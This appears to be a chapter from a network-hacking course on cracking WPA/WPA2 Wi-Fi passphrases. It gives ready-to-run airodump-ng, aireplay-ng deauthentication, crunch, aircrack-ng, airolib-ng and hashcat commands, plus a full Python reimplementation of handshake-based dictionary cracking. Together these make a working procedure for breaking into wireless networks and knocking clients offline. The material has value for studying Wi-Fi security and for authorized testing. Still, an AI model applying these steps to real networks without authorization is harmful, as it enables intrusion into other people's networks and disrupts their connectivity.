NETWORK HACKING CHAPTER : 13

THEORY AND CODES FOR WPA/WPA2 CRACKING

  • As explained before, capturing ordinary WPA data packets is not useful,
    because they contain nothing that can be used to recover the key.
    The only packets that contain information that helps us crack the
    password are the handshake packets.
    Every time a client connects to the AP, a four-way handshake
    occurs between the client and the AP. The handshake does not carry the
    key itself; it carries the nonces and a MIC (message integrity check)
    that let us test whether a guessed passphrase is the right one.
    By capturing the handshake, we can use aircrack-ng to launch a
    wordlist attack against the handshake to determine the key.
  • Conclusion:
    To crack a WPA/WPA2 AP with WPS disabled we need two
    things:
    1. Capture the handshake.
    2. A wordlist
  • Capturing the handshake
    Handshake packets are sent every time a client associates with the
    target AP, so to capture one we are going to:
    1. Start airodump-ng on the target AP:
    > airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
    Ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0
    airodump-ng appends a sequence number to the file name, so --write out
    produces out-01.cap; that is the file passed to aircrack-ng later.
    2. Wait for a client to connect to the AP, or deauthenticate a connected
    client (if any) for a very short period of time so that its system will
    connect back automatically.
    > aireplay-ng --deauth [number of deauth packets] -a [AP] -c [target] [interface]
    Ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c 00:AA:11:22:33:44 mon0
    A handful of deauth frames is usually enough; a large count only keeps the
    client off the network for longer than needed. Without -c, aireplay-ng sends
    the deauthentication to the broadcast address, i.e. to every client of the AP.
    Notice the top right corner of airodump-ng will say "WPA handshake:" followed
    by the BSSID once the handshake has been captured.
  • Creating a Wordlist
    The second thing that we need to crack WPA/WPA2 is a list of passwords to
    guess. You can download a ready-made wordlist from the internet (links
    attached) or create your own using a tool called crunch.
    > crunch [min] [max] [characters] -t [pattern] -o [file]
    ex: crunch 8 8 '123456!"£$%' -o wordlist -t a@@@@@@b
    [characters] is the set of characters to generate from (either typed
    directly, as above, or a named set from crunch's charset.lst); quote it when
    it contains shell characters such as ! " $ %. In a -t pattern, @ marks a
    position to be filled from the character set and every other character is
    literal, so [min] and [max] must both equal the pattern length.
    WPA/WPA2 passphrases are 8 to 63 characters long and aircrack-ng skips
    shorter candidates, so never generate words shorter than 8 characters.
  • Cracking the key
    We are going to use aircrack-ng to crack the key. It does this by
    combining each password in the wordlist with the AP name (ESSID) to
    compute a Pairwise Master Key (PMK) using the PBKDF2 algorithm
    (PBKDF2-HMAC-SHA1, 4096 iterations, 32-byte output). The PMK is then
    combined with the two MAC addresses and the two nonces taken from the
    captured handshake to derive the Pairwise Transient Key (PTK); the first
    16 bytes of the PTK are used to compute the MIC of the handshake's
    EAPOL frame, and that MIC is compared with the one in the captured
    handshake. A match means the guessed password is the key.
    > aircrack-ng [HANDSHAKE FILE] -w [WORDLIST]
    ex: aircrack-ng is-01.cap -w list
  • Cracking the key using airolib-ng
    Computing the PMK is slow, and it only depends on the wordlist and the ESSID
    of the target AP (not on the handshake), therefore we can save time by
    computing the PMKs for our wordlist while waiting for the handshake.
    Once we have the handshake, only the cheap PTK and MIC steps remain.
    1. Create a database and import wordlist.
    > airolib-ng [db_name] --import passwd [dictionary]
    ex: airolib-ng is-db --import passwd list
    2. Import the target ESSID (a text file containing the ESSID, one per line).
    > airolib-ng [db_name] --import essid [essid-file]
    ex: airolib-ng is-db --import essid essid-name
    3. Compute PMK for the wordlist.
    > airolib-ng [db_name] --batch
    ex: airolib-ng is-db --batch
    4. Crack the key using the PMK database.
    > aircrack-ng -r [db_name] [handshake_file]
    ex: aircrack-ng -r is-db is-01.cap
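    The following is an added example, not code from the course: it implements
    in pure Python what aircrack-ng does when it "compares a password to the
    handshake", and what airolib-ng precomputes. The handshake is constructed
    here from a known passphrase rather than captured; the SSID "TestNet", the
    passphrase "a210102b", the nonces and the crunch-style pattern are all
    assumptions chosen for the demo, while the BSSID and client MAC are the
    ones used in this chapter's examples. The candidate list is generated the
    way crunch -t does, the PMKs are precomputed once (the --batch step), and
    each candidate is checked PMK -> PTK -> KCK -> MIC against the captured MIC.

```python
# Added example (not part of the course): aircrack-ng / airolib-ng logic in Python.
import hashlib
import hmac
import itertools

SSID = "TestNet"                            # assumed target network (constructed)
AP_MAC = bytes.fromhex("112233445566")      # BSSID from the chapter's examples
CLIENT_MAC = bytes.fromhex("00aa11223344")  # client from the chapter's examples
SECRET_PASSPHRASE = "a210102b"              # assumed key the search must recover


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    Depends only on (passphrase, ssid): this is the slow part airolib-ng precomputes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Everything except the PMK comes straight out of the captured handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_key_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key message 2 (client -> AP) laid out as on the wire: 802.1X header
    (version, type 3 = EAPOL-Key, length) followed by the key descriptor.
    The 16-byte MIC field sits at offset 81 and is zeroed when the MIC is computed."""
    body = (b"\x02"            # descriptor type: RSN (WPA2)
            + b"\x01\x0a"      # key info: HMAC-SHA1 (version 2), pairwise, MIC present
            + b"\x00\x00"      # key length
            + b"\x00" * 8      # replay counter
            + snonce           # key nonce (SNonce)
            + b"\x00" * 32     # key IV (16), key RSC (8), key ID (8)
            + mic
            + b"\x00\x00")     # key data length (RSN IE omitted in this constructed frame)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def mic_for(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, whole EAPOL frame)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def constructed_handshake():
    """A fake capture: the fields you would parse out of airodump-ng's .cap file."""
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # constructed nonces
    pmk = pmk_from_passphrase(SECRET_PASSPHRASE, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, anonce, snonce)[:16]
    mic = mic_for(kck, eapol_key_msg2(snonce))
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC,
            "anonce": anonce, "snonce": snonce,
            "eapol": eapol_key_msg2(snonce, mic)}    # frame as captured, MIC filled in


def pattern_wordlist(pattern: str, charset: str):
    """crunch -t style: every '@' is filled from charset, all other characters are literal."""
    slots = [i for i, c in enumerate(pattern) if c == "@"]
    for combo in itertools.product(charset, repeat=len(slots)):
        chars = list(pattern)
        for i, c in zip(slots, combo):
            chars[i] = c
        yield "".join(chars)


def build_pmk_table(wordlist, ssid):
    """airolib-ng --batch: run PBKDF2 once per word, before the handshake arrives.
    Words outside 8..63 characters can never be a WPA passphrase, so skip them."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist if 8 <= len(w) <= 63}


def crack(handshake, pmk_table):
    """aircrack-ng's test per candidate: PMK -> PTK -> KCK -> MIC, compared with the capture."""
    frame = handshake["eapol"]
    captured_mic = frame[81:97]
    zeroed = frame[:81] + b"\x00" * 16 + frame[97:]
    for word, pmk in pmk_table.items():
        kck = ptk_from_pmk(pmk, handshake["ap"], handshake["client"],
                           handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(mic_for(kck, zeroed), captured_mic):
            return word
    return None


def demo():
    """Generate a@@@@@@b over '012' (729 candidates), precompute PMKs, then crack."""
    hs = constructed_handshake()
    table = build_pmk_table(pattern_wordlist("a@@@@@@b", "012"), hs["ssid"])
    return crack(hs, table)


if __name__ == "__main__":
    print("KEY FOUND:", demo())
```

    pmk_from_passphrase can be checked against the IEEE 802.11i test vector
    (passphrase "password", SSID "IEEE"), and the cost split is visible in the
    code: the PBKDF2 loop in build_pmk_table is what takes the time and is
    reusable for any handshake from that ESSID, while the per-candidate work in
    crack is three HMACs.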
  • Cracking the key using hashcat
    We can speed up the cracking process using a tool called hashcat, which
    uses the GPU instead of the CPU for the cracking process (the PBKDF2 step
    is what dominates, and it parallelises well on a GPU).
    First download oclHashcat and the hashcat GUI from the following URLs:
    http://hashcat.net/oclhashcat/
    http://hashcat.net/hashcat-gui/
    To use it we need to change the handshake file format to hccap; we can
    do this using the following website:
    https://hashcat.net/cap2hccap
    Note that oclHashcat has since been merged into hashcat and the hccap
    format is legacy: current hashcat versions take the WPA-PBKDF2-PMKID+EAPOL
    format (hash mode 22000), which is produced offline from the .cap file with
    hcxpcapngtool, so no upload of the capture to a website is needed.